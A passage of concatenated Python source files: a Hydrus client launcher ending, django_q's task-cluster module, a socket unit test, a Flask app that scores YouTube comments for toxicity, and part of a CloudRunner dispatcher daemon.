argparser.add_argument( '--no_wal', action='store_true', help = 'run without WAL db journalling' )
result = argparser.parse_args()
if result.db_dir is None:
db_dir = HC.DEFAULT_DB_DIR
if not HydrusPaths.DirectoryIsWritable( db_dir ):
db_dir = os.path.join( os.path.expanduser( '~' ), 'Hydrus' )
else:
db_dir = result.db_dir
db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )
try:
HydrusPaths.MakeSureDirectoryExists( db_dir )
except:
raise Exception( 'Could not ensure db path ' + db_dir + ' exists! Check the location is correct and that you have permission to write to it!' )
no_daemons = result.no_daemons
no_wal = result.no_wal
#
with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:
try:
HydrusData.Print( 'hydrus client started' )
threading.Thread( target = reactor.run, kwargs = { 'installSignalHandlers' : 0 } ).start()
controller = ClientController.Controller( db_dir, no_daemons, no_wal )
controller.Run()
except:
HydrusData.Print( 'hydrus client failed' )
HydrusData.Print( traceback.format_exc() )
finally:
HG.view_shutdown = True
HG.model_shutdown = True
try:
controller.pubimmediate( 'wake_daemons' )
except:
HydrusData.Print( traceback.format_exc() )
reactor.callFromThread( reactor.stop )
HydrusData.Print( 'hydrus client shut down' )
HG.shutdown_complete = True
if HG.restart:
HydrusData.RestartProcess()
except Exception as e:
import traceback
import os
print( traceback.format_exc() )
if 'db_dir' in locals() and os.path.exists( db_dir ):
dest_path = os.path.join( db_dir, 'crash.log' )
with open( dest_path, 'wb' ) as f:
f.write( traceback.format_exc() )
    print( 'Critical error occurred! Details written to crash.log!' )
|
cluster.py
|
# Future
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# Standard
import importlib
import signal
import socket
import ast
from time import sleep
from multiprocessing import Event, Process, Value, current_process
# external
import arrow
# Django
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django import db
# Local
from django_q import tasks
from django_q.compat import range
from django_q.conf import Conf, logger, psutil, get_ppid, error_reporter, rollbar
from django_q.models import Task, Success, Schedule
from django_q.signing import SignedPackage, BadSignature
from django_q.status import Stat, Status
from django_q.brokers import get_broker
from django_q.signals import pre_execute
from django_q.queues import Queue
class Cluster(object):
def __init__(self, broker=None):
self.broker = broker or get_broker()
self.sentinel = None
self.stop_event = None
self.start_event = None
self.pid = current_process().pid
self.host = socket.gethostname()
self.timeout = Conf.TIMEOUT
signal.signal(signal.SIGTERM, self.sig_handler)
signal.signal(signal.SIGINT, self.sig_handler)
def start(self):
# Start Sentinel
self.stop_event = Event()
self.start_event = Event()
self.sentinel = Process(target=Sentinel,
args=(self.stop_event, self.start_event, self.broker, self.timeout))
self.sentinel.start()
logger.info(_('Q Cluster-{} starting.').format(self.pid))
while not self.start_event.is_set():
sleep(0.1)
return self.pid
def stop(self):
if not self.sentinel.is_alive():
return False
logger.info(_('Q Cluster-{} stopping.').format(self.pid))
self.stop_event.set()
self.sentinel.join()
logger.info(_('Q Cluster-{} has stopped.').format(self.pid))
self.start_event = None
self.stop_event = None
return True
def sig_handler(self, signum, frame):
logger.debug(_('{} got signal {}').format(current_process().name,
Conf.SIGNAL_NAMES.get(signum, 'UNKNOWN')))
self.stop()
@property
def stat(self):
if self.sentinel:
return Stat.get(self.pid)
return Status(self.pid)
@property
def is_starting(self):
return self.stop_event and self.start_event and not self.start_event.is_set()
@property
def is_running(self):
return self.stop_event and self.start_event and self.start_event.is_set()
@property
def is_stopping(self):
return self.stop_event and self.start_event and self.start_event.is_set() and self.stop_event.is_set()
@property
def has_stopped(self):
return self.start_event is None and self.stop_event is None and self.sentinel
class Sentinel(object):
def __init__(self, stop_event, start_event, broker=None, timeout=Conf.TIMEOUT, start=True):
# Make sure we catch signals for the pool
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
self.pid = current_process().pid
self.parent_pid = get_ppid()
self.name = current_process().name
self.broker = broker or get_broker()
self.reincarnations = 0
self.tob = timezone.now()
self.stop_event = stop_event
self.start_event = start_event
self.pool_size = Conf.WORKERS
self.pool = []
self.timeout = timeout
self.task_queue = Queue(maxsize=Conf.QUEUE_LIMIT) if Conf.QUEUE_LIMIT else Queue()
self.result_queue = Queue()
self.event_out = Event()
self.monitor = None
self.pusher = None
if start:
self.start()
def start(self):
self.broker.ping()
self.spawn_cluster()
self.guard()
def status(self):
if not self.start_event.is_set() and not self.stop_event.is_set():
return Conf.STARTING
elif self.start_event.is_set() and not self.stop_event.is_set():
if self.result_queue.empty() and self.task_queue.empty():
return Conf.IDLE
return Conf.WORKING
elif self.stop_event.is_set() and self.start_event.is_set():
if self.monitor.is_alive() or self.pusher.is_alive() or len(self.pool) > 0:
return Conf.STOPPING
return Conf.STOPPED
def spawn_process(self, target, *args):
"""
:type target: function or class
"""
p = Process(target=target, args=args)
p.daemon = True
if target == worker:
p.daemon = Conf.DAEMONIZE_WORKERS
p.timer = args[2]
self.pool.append(p)
p.start()
return p
def spawn_pusher(self):
return self.spawn_process(pusher, self.task_queue, self.event_out, self.broker)
def spawn_worker(self):
self.spawn_process(worker, self.task_queue, self.result_queue, Value('f', -1), self.timeout)
def spawn_monitor(self):
return self.spawn_process(monitor, self.result_queue, self.broker)
def reincarnate(self, process):
"""
:param process: the process to reincarnate
:type process: Process or None
"""
db.connections.close_all() # Close any old connections
if process == self.monitor:
self.monitor = self.spawn_monitor()
logger.error(_("reincarnated monitor {} after sudden death").format(process.name))
elif process == self.pusher:
self.pusher = self.spawn_pusher()
logger.error(_("reincarnated pusher {} after sudden death").format(process.name))
else:
self.pool.remove(process)
self.spawn_worker()
if self.timeout and int(process.timer.value) == 0:
# only need to terminate on timeout, otherwise we risk destabilizing the queues
process.terminate()
logger.warn(_("reincarnated worker {} after timeout").format(process.name))
elif int(process.timer.value) == -2:
logger.info(_("recycled worker {}").format(process.name))
else:
logger.error(_("reincarnated worker {} after death").format(process.name))
self.reincarnations += 1
def spawn_cluster(self):
self.pool = []
Stat(self).save()
db.connection.close()
# spawn worker pool
for __ in range(self.pool_size):
self.spawn_worker()
# spawn auxiliary
self.monitor = self.spawn_monitor()
self.pusher = self.spawn_pusher()
# set worker cpu affinity if needed
if psutil and Conf.CPU_AFFINITY:
set_cpu_affinity(Conf.CPU_AFFINITY, [w.pid for w in self.pool])
def guard(self):
logger.info(_('{} guarding cluster at {}').format(current_process().name, self.pid))
self.start_event.set()
Stat(self).save()
logger.info(_('Q Cluster-{} running.').format(self.parent_pid))
scheduler(broker=self.broker)
counter = 0
cycle = Conf.GUARD_CYCLE # guard loop sleep in seconds
# Guard loop. Runs at least once
while not self.stop_event.is_set() or not counter:
# Check Workers
for p in self.pool:
# Are you alive?
if not p.is_alive() or (self.timeout and p.timer.value == 0):
self.reincarnate(p)
continue
# Decrement timer if work is being done
if self.timeout and p.timer.value > 0:
p.timer.value -= cycle
# Check Monitor
if not self.monitor.is_alive():
self.reincarnate(self.monitor)
# Check Pusher
if not self.pusher.is_alive():
self.reincarnate(self.pusher)
# Call scheduler once a minute (or so)
counter += cycle
if counter >= 30 and Conf.SCHEDULER:
counter = 0
scheduler(broker=self.broker)
# Save current status
Stat(self).save()
sleep(cycle)
self.stop()
def stop(self):
Stat(self).save()
name = current_process().name
logger.info(_('{} stopping cluster processes').format(name))
# Stopping pusher
self.event_out.set()
# Wait for it to stop
while self.pusher.is_alive():
sleep(0.1)
Stat(self).save()
# Put poison pills in the queue
for __ in range(len(self.pool)):
self.task_queue.put('STOP')
self.task_queue.close()
# wait for the task queue to empty
self.task_queue.join_thread()
# Wait for all the workers to exit
while len(self.pool):
for p in self.pool:
if not p.is_alive():
self.pool.remove(p)
sleep(0.1)
Stat(self).save()
# Finally stop the monitor
self.result_queue.put('STOP')
self.result_queue.close()
# Wait for the result queue to empty
self.result_queue.join_thread()
logger.info(_('{} waiting for the monitor.').format(name))
# Wait for everything to close or time out
count = 0
if not self.timeout:
self.timeout = 30
while self.status() == Conf.STOPPING and count < self.timeout * 10:
sleep(0.1)
Stat(self).save()
count += 1
# Final status
Stat(self).save()
def pusher(task_queue, event, broker=None):
"""
    Pulls tasks off the broker and puts them in the task queue
:type task_queue: multiprocessing.Queue
:type event: multiprocessing.Event
"""
if not broker:
broker = get_broker()
logger.info(_('{} pushing tasks at {}').format(current_process().name, current_process().pid))
while True:
try:
task_set = broker.dequeue()
except Exception as e:
logger.error(e)
# broker probably crashed. Let the sentinel handle it.
sleep(10)
break
if task_set:
for task in task_set:
ack_id = task[0]
# unpack the task
try:
task = SignedPackage.loads(task[1])
except (TypeError, BadSignature) as e:
logger.error(e)
broker.fail(ack_id)
continue
task['ack_id'] = ack_id
task_queue.put(task)
logger.debug(_('queueing from {}').format(broker.list_key))
if event.is_set():
break
logger.info(_("{} stopped pushing tasks").format(current_process().name))
def monitor(result_queue, broker=None):
"""
Gets finished tasks from the result queue and saves them to Django
:type result_queue: multiprocessing.Queue
"""
if not broker:
broker = get_broker()
name = current_process().name
logger.info(_("{} monitoring at {}").format(name, current_process().pid))
for task in iter(result_queue.get, 'STOP'):
# save the result
if task.get('cached', False):
save_cached(task, broker)
else:
save_task(task, broker)
# acknowledge result
ack_id = task.pop('ack_id', False)
if ack_id and (task['success'] or task.get('ack_failure', False)):
broker.acknowledge(ack_id)
# log the result
if task['success']:
# log success
logger.info(_("Processed [{}]").format(task['name']))
else:
# log failure
logger.error(_("Failed [{}] - {}").format(task['name'], task['result']))
logger.info(_("{} stopped monitoring results").format(name))
def worker(task_queue, result_queue, timer, timeout=Conf.TIMEOUT):
"""
Takes a task from the task queue, tries to execute it and puts the result back in the result queue
:type task_queue: multiprocessing.Queue
:type result_queue: multiprocessing.Queue
:type timer: multiprocessing.Value
"""
name = current_process().name
logger.info(_('{} ready for work at {}').format(name, current_process().pid))
task_count = 0
# Start reading the task queue
for task in iter(task_queue.get, 'STOP'):
result = None
timer.value = -1 # Idle
task_count += 1
# Get the function from the task
logger.info(_('{} processing [{}]').format(name, task['name']))
f = task['func']
# if it's not an instance try to get it from the string
if not callable(f):
try:
module, func = f.rsplit('.', 1)
m = importlib.import_module(module)
f = getattr(m, func)
except (ValueError, ImportError, AttributeError) as e:
result = (e, False)
if error_reporter:
error_reporter.report()
if rollbar:
rollbar.report_exc_info()
# We're still going
if not result:
db.close_old_connections()
timer_value = task['kwargs'].pop('timeout', timeout or 0)
# signal execution
pre_execute.send(sender="django_q", func=f, task=task)
# execute the payload
timer.value = timer_value # Busy
try:
res = f(*task['args'], **task['kwargs'])
result = (res, True)
except Exception as e:
result = ('{}'.format(e), False)
if error_reporter:
error_reporter.report()
if rollbar:
rollbar.report_exc_info()
# Process result
task['result'] = result[0]
task['success'] = result[1]
task['stopped'] = timezone.now()
result_queue.put(task)
timer.value = -1 # Idle
# Recycle
if task_count == Conf.RECYCLE:
timer.value = -2 # Recycled
break
logger.info(_('{} stopped doing work').format(name))
def save_task(task, broker):
"""
Saves the task package to Django or the cache
"""
# SAVE LIMIT < 0 : Don't save success
if not task.get('save', Conf.SAVE_LIMIT >= 0) and task['success']:
return
# async next in a chain
if task.get('chain', None):
tasks.async_chain(task['chain'], group=task['group'], cached=task['cached'], sync=task['sync'], broker=broker)
# SAVE LIMIT > 0: Prune database, SAVE_LIMIT 0: No pruning
db.close_old_connections()
try:
if task['success'] and 0 < Conf.SAVE_LIMIT <= Success.objects.count():
Success.objects.last().delete()
# check if this task has previous results
if Task.objects.filter(id=task['id'], name=task['name']).exists():
existing_task = Task.objects.get(id=task['id'], name=task['name'])
# only update the result if it hasn't succeeded yet
if not existing_task.success:
existing_task.stopped = task['stopped']
existing_task.result = task['result']
existing_task.success = task['success']
existing_task.save()
else:
Task.objects.create(id=task['id'],
name=task['name'],
func=task['func'],
hook=task.get('hook'),
args=task['args'],
kwargs=task['kwargs'],
started=task['started'],
stopped=task['stopped'],
result=task['result'],
group=task.get('group'),
success=task['success']
)
except Exception as e:
logger.error(e)
def save_cached(task, broker):
task_key = '{}:{}'.format(broker.list_key, task['id'])
timeout = task['cached']
if timeout is True:
timeout = None
try:
group = task.get('group', None)
iter_count = task.get('iter_count', 0)
# if it's a group append to the group list
if group:
group_key = '{}:{}:keys'.format(broker.list_key, group)
group_list = broker.cache.get(group_key) or []
# if it's an iter group, check if we are ready
if iter_count and len(group_list) == iter_count - 1:
group_args = '{}:{}:args'.format(broker.list_key, group)
# collate the results into a Task result
results = [SignedPackage.loads(broker.cache.get(k))['result'] for k in group_list]
results.append(task['result'])
task['result'] = results
task['id'] = group
task['args'] = SignedPackage.loads(broker.cache.get(group_args))
task.pop('iter_count', None)
task.pop('group', None)
if task.get('iter_cached', None):
task['cached'] = task.pop('iter_cached', None)
save_cached(task, broker=broker)
else:
save_task(task, broker)
broker.cache.delete_many(group_list)
broker.cache.delete_many([group_key, group_args])
return
# save the group list
group_list.append(task_key)
broker.cache.set(group_key, group_list, timeout)
# async next in a chain
if task.get('chain', None):
tasks.async_chain(task['chain'], group=group, cached=task['cached'], sync=task['sync'], broker=broker)
# save the task
broker.cache.set(task_key,
SignedPackage.dumps(task),
timeout)
except Exception as e:
logger.error(e)
def scheduler(broker=None):
"""
Creates a task from a schedule at the scheduled time and schedules next run
"""
if not broker:
broker = get_broker()
db.close_old_connections()
try:
for s in Schedule.objects.exclude(repeats=0).filter(next_run__lt=timezone.now()):
args = ()
kwargs = {}
# get args, kwargs and hook
if s.kwargs:
try:
# eval should be safe here because dict()
kwargs = eval('dict({})'.format(s.kwargs))
except SyntaxError:
kwargs = {}
if s.args:
args = ast.literal_eval(s.args)
# single value won't eval to tuple, so:
if type(args) != tuple:
args = (args,)
q_options = kwargs.get('q_options', {})
if s.hook:
q_options['hook'] = s.hook
# set up the next run time
if not s.schedule_type == s.ONCE:
next_run = arrow.get(s.next_run)
while True:
if s.schedule_type == s.MINUTES:
next_run = next_run.replace(minutes=+(s.minutes or 1))
elif s.schedule_type == s.HOURLY:
next_run = next_run.replace(hours=+1)
elif s.schedule_type == s.DAILY:
next_run = next_run.replace(days=+1)
elif s.schedule_type == s.WEEKLY:
next_run = next_run.replace(weeks=+1)
elif s.schedule_type == s.MONTHLY:
next_run = next_run.replace(months=+1)
elif s.schedule_type == s.QUARTERLY:
next_run = next_run.replace(months=+3)
elif s.schedule_type == s.YEARLY:
next_run = next_run.replace(years=+1)
if Conf.CATCH_UP or next_run > arrow.utcnow():
break
s.next_run = next_run.datetime
s.repeats += -1
# send it to the cluster
q_options['broker'] = broker
q_options['group'] = q_options.get('group', s.name or s.id)
kwargs['q_options'] = q_options
s.task = tasks.async(s.func, *args, **kwargs)
# log it
if not s.task:
logger.error(
_('{} failed to create a task from schedule [{}]').format(current_process().name,
s.name or s.id))
else:
logger.info(
_('{} created a task from schedule [{}]').format(current_process().name, s.name or s.id))
# default behavior is to delete a ONCE schedule
if s.schedule_type == s.ONCE:
if s.repeats < 0:
s.delete()
continue
# but not if it has a positive repeats
s.repeats = 0
# save the schedule
s.save()
except Exception as e:
logger.error(e)
def set_cpu_affinity(n, process_ids, actual=not Conf.TESTING):
"""
Sets the cpu affinity for the supplied processes.
Requires the optional psutil module.
:param int n: affinity
:param list process_ids: a list of pids
:param bool actual: Test workaround for Travis not supporting cpu affinity
"""
# check if we have the psutil module
if not psutil:
logger.warning('Skipping cpu affinity because psutil was not found.')
return
# check if the platform supports cpu_affinity
if actual and not hasattr(psutil.Process(process_ids[0]), 'cpu_affinity'):
logger.warning('Faking cpu affinity because it is not supported on this platform')
actual = False
# get the available processors
cpu_list = list(range(psutil.cpu_count()))
    # an affinity of 0, or one >= the cpu count, means no affinity
if not n or n >= len(cpu_list):
return
# spread the workers over the available processors.
index = 0
for pid in process_ids:
affinity = []
for k in range(n):
if index == len(cpu_list):
index = 0
affinity.append(cpu_list[index])
index += 1
if psutil.pid_exists(pid):
p = psutil.Process(pid)
if actual:
p.cpu_affinity(affinity)
logger.info(_('{} will use cpu {}').format(pid, affinity))
|
test_io.py
|
import unittest
import socket
import threading
import time
import random
from ppctools.network import PPCToolsConnection
CONNECTINFO = ('localhost', random.randint(1024, 4096))
TOKEN = 'supersecrettoken13987kjc131'
NUMBER1 = 134124
def handle_connection(request):
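    # Scripted dialog the client under test must follow: an arithmetic greeting, a token prompt,
    # a number exchange in which the server echoes the number plus 10, and a goodbye.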
request.sendall(b'Welcome! Please check 2 + 2 = 4 ')
request.recv(1024)
request.sendall(b'Token: ')
request.recv(1024)
request.sendall(b'Ok. Let\'s play!\n')
time.sleep(0.5)
request.sendall(b'Give me a number: ')
number = int(request.recv(1024).decode())
request.sendall(f'Hmm {number + 10} is it number + 10? '.encode())
request.recv(1024)
request.sendall(b'Bye!\n')
def run_server():
s = socket.socket()
s.bind(CONNECTINFO)
s.listen(1)
r, addr = s.accept()
del addr
handle_connection(r)
r.close()
s.close()
class TestConnectionClass(unittest.TestCase):
def setUp(self):
threading.Thread(target=run_server, daemon=True).start()
        time.sleep(1)  # wait for the server to come up
def test_connection(self):
print('\n---------- connect dialog begin ----------\n')
conn = PPCToolsConnection(*CONNECTINFO)
args = conn.read().split()[3:]
self.assertEqual(int(args[0]) + int(args[2]), int(args[4]))
conn.send('Ok')
self.assertEqual(conn.read(), 'Token: ')
conn.send(TOKEN)
conn.read(2)
conn.send(NUMBER1)
num = int(conn.read().split()[1])
self.assertEqual(num, NUMBER1 + 10)
conn.send('yes')
conn.read()
print('\n---------- connect dialog end ----------')
|
app.py
|
from flask import Flask, request, render_template, Response
from flask import make_response, jsonify
import sys
import os
import requests
import json
import threading
import time
import pandas as pd
import tempfile
import datetime
from collections import defaultdict
import namegenerator
sys.path.append(os.path.abspath("./"))
from apollo.Scraper.config import (
USER_AGENT,
YOUTUBE_VIDEO_URL,
)
if not(os.path.isdir(os.path.join('./', 'downloads'))):
os.mkdir(os.path.join('./', 'downloads'))
from apollo.Scraper.LinkParser import extract_id
from apollo.inference.inference import inference_v2, load_model
from apollo.Scraper.download_comments import download_comments
app = Flask(__name__)
app.secret_key = os.urandom(24)
LOAD_MODEL_THREAD = None
chart_data = [0, 0]
log_data = ''
DATA_STORE = defaultdict(list)
COMMENTS_STORE = []
@app.after_request
def add_header(response):
"""
Add headers to both force latest IE rendering engine or Chrome Frame,
and also to cache the rendered page for 10 minutes.
"""
response.headers["X-UA-Compatible"] = "IE=Edge,chrome=1"
response.headers["Cache-Control"] = "public, max-age=0"
return response
def scrapper_v2(youtube_id, sensitivity, limit):
'''
Code modified from : https://github.com/egbertbouman/youtube-comment-downloader
:param youtube_id: ID of Youtube Video Link
:param sensitivity: Sensitivity tolerance level (To be used as threshold during inference)
:param limit: Number of comments to be scraped
:return: CSV file of output comments
'''
try:
# if LOAD_MODEL_THREAD is not None:
LOAD_MODEL_THREAD.join()
global chart_data
global log_data
global DATA_STORE
filename = '{}_{}_{}.csv'.format(youtube_id, sensitivity, limit)
chart_data = [0, 0]
log_data = ''
df = pd.DataFrame(columns=['id', 'comment', 'score', 'sensitivity'])
toxic_count, nontoxic_count = 0 , 0
count_list = []
comment_list = []
score_list = []
sensitivity_list = []
if not youtube_id:
log_data = 'error'
chart_data = [0, 0]
raise ValueError("you need to specify a Youtube ID")
print("Downloading Youtube comments for video:", youtube_id)
count = 0
session = requests.Session()
session.headers["User-Agent"] = USER_AGENT
response = session.get(YOUTUBE_VIDEO_URL.format(youtube_id=youtube_id))
html = response.text
if "og:title" in html:
for comment in download_comments(youtube_id):
comment_content = comment['content']
score = inference_v2(comment_content, sensitivity)
count += 1
count_list.append(count)
comment_list.append(comment_content)
score_list.append(score)
sensitivity_list.append(sensitivity)
if score > (sensitivity):
toxic_count += 1
else:
nontoxic_count +=1
chart_data = [toxic_count, nontoxic_count]
# comment['author']
author_dummy_name = namegenerator.gen()
extra_log_data = [comment['content'], comment['time'], author_dummy_name, comment['votes'], comment['photo'], str(score)]
if limit and count >= limit:
DATA_STORE[youtube_id].append({'chart_data':chart_data, 'extra_log_data': extra_log_data, 'task_finished': True, 'success': True, 'index': count, 'filename': filename})
df['id'], df['comment'], df['score'], df['sensitivity'] = count_list, comment_list, score_list, sensitivity_list
LOG_RESULT_DATA = filename
# filepath = os.path.abspath(os.path.join('./', 'downloads', filename))
filepath = os.path.abspath(os.path.join('./apollo/Frontend/static', filename))
df.to_csv(filepath, encoding='utf-8')
break
else:
DATA_STORE[youtube_id].append({'chart_data':chart_data, 'extra_log_data': extra_log_data, 'task_finished': False, 'success': True, 'index': count, 'filename': filename})
print(comment_content, toxic_count, nontoxic_count, score)
sys.stdout.write("Downloaded %d comment(s)\r" % count)
sys.stdout.flush()
print("\nDone!")
else:
print(f"The provided YouTube ID : {youtube_id} is invalid! ")
DATA_STORE[youtube_id].append({'chart_data':[], 'extra_log_data': [], 'task_finished': True, 'success': False, 'index': -1, 'filename': ''})
log_data = 'error'
chart_data = [0, 0]
except Exception as e:
print("Error:", str(e))
sys.exit(1)
@app.route('/chart-data', methods=['GET'])
def chart_data():
if request.method == 'GET':
url = request.args.get('url')
youtube_id = extract_id(url)
def send_data(youtube_id):
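            # Server-sent events: drain the per-video DATA_STORE entries and stream each one as a
            # `data:` frame, roughly once per second.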
while len(DATA_STORE[youtube_id])>0:
json_data = json.dumps(DATA_STORE[youtube_id].pop(0))
yield f"data:{json_data}\n\n"
time.sleep(1)
return Response(send_data(youtube_id), mimetype='text/event-stream')
@app.route("/about.html")
def about():
return render_template("about.html")
@app.route("/index.html")
def home_index():
response = make_response(render_template("index.html"))
response = add_header(response)
return response
@app.route("/")
def home():
global LOAD_MODEL_THREAD
LOAD_MODEL_THREAD = threading.Thread(target=load_model, args=())
LOAD_MODEL_THREAD.daemon = True
LOAD_MODEL_THREAD.start()
response = make_response(render_template("index.html"))
response = add_header(response)
return response
@app.route('/predict',methods=['GET', 'POST'])
def predict():
print('STARTING PREDICTION*********************')
'''
For rendering results on HTML GUI
'''
global COMPLETED
global LIMIT
COMPLETED = False
COMMENT_URL = [x for x in request.form.values()]
if len(COMMENT_URL[0]) == 0:
return jsonify(msg='URL missing', status='error')
COMMENT_LINK = extract_id(COMMENT_URL[0])
SENSITIVITY = float(COMMENT_URL[1])
LIMIT = int(COMMENT_URL[2])
if COMMENT_LINK is None:
print("Invalid link or the link is not supported yet.")
'''
Add a function to show the error message in html page
'''
return render_template('index.html',name ='')
else:
print (COMMENT_LINK)
scrapper_v2(COMMENT_LINK, SENSITIVITY, LIMIT)
return jsonify(msg='scraping successfully', status='success')
if __name__ == "__main__":
app.run(debug=True, threaded=True)
|
server.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# /*******************************************************
# * Copyright (C) 2013-2014 CloudRunner.io <info@cloudrunner.io>
# *
# * Proprietary and confidential
# * This file is part of CloudRunner Server.
# *
# * CloudRunner Server can not be copied and/or distributed
# * without the express permission of CloudRunner.io
# *******************************************************/
try:
import argcomplete
except ImportError:
pass
import argparse
import logging
import os
import signal
import threading
from cloudrunner import CONFIG_LOCATION
from cloudrunner import LOG_LOCATION
from cloudrunner.util.config import Config
from cloudrunner.util.logconfig import configure_loggers
CONFIG = Config(CONFIG_LOCATION)
if CONFIG.verbose_level:
configure_loggers(getattr(logging, CONFIG.verbose_level, 'INFO'),
LOG_LOCATION)
else:
configure_loggers(logging.DEBUG if CONFIG.verbose else logging.INFO,
LOG_LOCATION)
from cloudrunner.core.exceptions import ConnectionError
from cloudrunner.plugins.args_provider import ManagedPlugin
from cloudrunner.util.daemon import Daemon
from cloudrunner.util.loader import load_plugins, local_plugin_loader
from cloudrunner.util.shell import colors
from cloudrunner_server.core.message import (M, Dispatch, GetNodes, Nodes,
Error, Queued)
from cloudrunner_server.dispatcher import (TaskQueue)
from cloudrunner_server.dispatcher.admin import Admin
from cloudrunner_server.dispatcher.manager import SessionManager
from cloudrunner_server.plugins import PLUGIN_BASES
from cloudrunner_server.plugins.logs.base import LoggerPluginBase
LOG = logging.getLogger("Dispatcher")
class Dispatcher(Daemon):
"""
Main dispatcher. Receives requests from clients
and runs them on the specified nodes
"""
def __init__(self, *_args, **kwargs):
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-p', '--pidfile', dest='pidfile',
help='Daemonize process with the '
'given pid file')
arg_parser.add_argument('-c', '--config', help='Config file')
arg_parser.add_argument(
'action',
choices=[
'start', 'stop', 'restart', 'run'],
help='Apply action on the daemonized process\n'
'For the actions [start, stop, restart] - pass a pid file\n'
'Run - start process in debug mode\n')
try:
argcomplete.autocomplete(arg_parser)
except:
pass
if _args:
self.args = arg_parser.parse_args(_args)
else:
self.args = arg_parser.parse_args()
if self.args.pidfile:
super(Dispatcher, self).__init__(self.args.pidfile,
stdout='/tmp/log')
elif self.args.action in ['start', 'stop', 'restart']:
print colors.red("The --pidfile option is required"
" with [start, stop, restart] commands",
bold=1)
exit(1)
global CONFIG
if 'config' in kwargs:
CONFIG = kwargs['config']
elif self.args.config:
CONFIG = Config(self.args.config)
def init_libs(self):
# instantiate dispatcher implementation
self.transport_class = local_plugin_loader(CONFIG.transport)
if not self.transport_class:
LOG.fatal('Cannot find transport class. Set it in config file.')
exit(1)
self.loaded_plugins = load_plugins(CONFIG, bases=PLUGIN_BASES)
args_plugins = argparse.ArgumentParser(add_help=False)
args_plugins.add_argument('-t', '--timeout', help="Timeout")
self.plugin_register = {}
for plugin_classes in self.loaded_plugins.values():
for plugin in plugin_classes:
if issubclass(plugin, ManagedPlugin):
try:
plugin.start(CONFIG)
except Exception, ex:
LOG.error('Plugin error(%s): %r' % (plugin, ex))
self.logger_klass = None
if LoggerPluginBase.__subclasses__():
self.logger_klass = LoggerPluginBase.__subclasses__()[0]
else:
if not CONFIG.logger:
LOG.warn('No Logger plugin found')
else:
self.logger_klass = local_plugin_loader(CONFIG.logger)
self.config = CONFIG
self.logger = None
if self.logger_klass:
self.logger = self.logger_klass(self.config)
self.logger.set_context_from_config()
LOG.info("Using %s.%s for Logger backend" % (
self.logger_klass.__module__,
self.logger_klass.__name__))
def list_active_nodes(self, org):
msg = Nodes()
if hasattr(self, 'backend'):
tenant = self.backend.tenants.get(org, None)
if tenant:
msg.nodes = [dict(name=n.name,
last_seen=int(n.last_seen),
usage=n.usage)
for n in tenant.active_nodes()]
return msg
return msg
"""
def attach(self, payload, remote_user_map, **kwargs):
'''
Attach to an existing pre-defined session
or create it if not started yet
'''
(targets, req_args) = parser.parse_selectors(payload)
queue = TaskQueue()
queue.targets = targets
return queue
def detach(self, payload, remote_user_map, **kwargs):
'''
Detach from an existing pre-defined session
'''
queue = TaskQueue()
queue.remove = True
return queue
"""
def notify(self, payload, remote_user_map, **kwargs):
session_id = str(kwargs.pop('session_id'))
job_id = str(kwargs.pop('job_id'))
targets = str(kwargs.pop('targets', '*'))
session = [sess for sess in self.manager.subscriptions.get(
session_id, []) if sess.owner == self.user_id]
if not session:
return [False, "You are not the owner of the session"]
job_queue = self.manager.backend.publish_queue('user_input')
job_queue.send(job_id, '', 'INPUT', session_id, self.user_id,
str(remote_user_map.org), payload, targets)
return [True, "Notified"]
def term(self, payload, remote_user_map, **kwargs):
session_id = str(kwargs.pop('session_id'))
session_sub = [sess for sess in self.manager.subscriptions.get(
session_id, []) if sess.owner == self.user_id]
if not session_sub:
return [False, "You are not the owner of the session"]
session = self.manager.sessions.get(session_id)
if session:
session.stop_reason = str(kwargs.get('action', 'term'))
session.session_event.set()
return [True, "Session terminated"]
else:
return [False, "Session not found"]
def dispatch(self, user, task_id, tasks, remote_user_map, env=None,
disabled_nodes=None):
"""
Dispatch script to targeted nodes
"""
queue = self.manager.prepare_session(
self.user_id, task_id, tasks, remote_user_map, env=env,
disabled_nodes=disabled_nodes)
return queue
def worker(self, *args):
job_queue = self.backend.consume_queue('requests')
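        # Consume raw request frames from the 'requests' queue, rebuild them into messages, and
        # route Dispatch / GetNodes requests; TaskQueue responses are answered with the queued
        # task ids and then processed.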
while not self.stopping.is_set():
try:
raw_frames = None
try:
raw_frames = job_queue.recv(timeout=500)
if not raw_frames:
continue
except ConnectionError:
break
except Exception, ex:
LOG.exception(ex)
if not self.stopping.is_set():
continue
# User -> queue
sender = ''
ident = raw_frames.pop(0)
pack = raw_frames.pop(0)
msg = M.build(pack)
if msg.control == 'QUIT':
# Node exited
continue
if not msg:
LOG.error("Invalid request %s" % raw_frames)
continue
if isinstance(msg, Dispatch):
self.user_id = msg.user
remote_user_map = msg.roles
disabled_nodes = msg.disabled_nodes or []
LOG.info('user: %s/%s' % (msg.user,
remote_user_map['org']))
response = self.dispatch(msg.user, msg.task_id,
msg.tasks, msg.roles,
env=getattr(msg, 'env', {}),
disabled_nodes=disabled_nodes)
elif isinstance(msg, GetNodes):
response = self.list_active_nodes(msg.org)
else:
# TODO: Check if a plugin supports command
job_queue.send(sender, Error(msg="Unknown command"))
continue
if isinstance(response, TaskQueue):
# Return job id
job_queue.send([ident,
Queued(task_ids=response.task_ids)._])
response.process()
elif isinstance(response, M):
job_queue.send(ident, response._)
except ConnectionError:
break
job_queue.close()
LOG.info('Server worker exited')
def logger_worker(self, *args):
log_queue = self.backend.consume_queue('logger')
while not self.stopping.is_set():
try:
frames = log_queue.recv(timeout=500)
if not frames:
continue
try:
self.logger.log(M.build(frames[0]))
except Exception, err:
LOG.exception(err)
except ConnectionError:
break
except Exception, err:
LOG.exception(err)
continue
log_queue.close()
LOG.info('Logger worker exited')
def choose(self):
getattr(self, self.args.action)()
def run(self):
self.init_libs()
if not self.config.sock_dir:
raise Exception("Socket dir (sock_dir) is not set in config")
if not os.path.exists(self.config.sock_dir):
try:
os.makedirs(self.config.sock_dir)
except:
raise Exception("Socket dir doesn't exist and "
"cannot be created")
WORKER_COUNT = int(CONFIG.workers_count or 10)
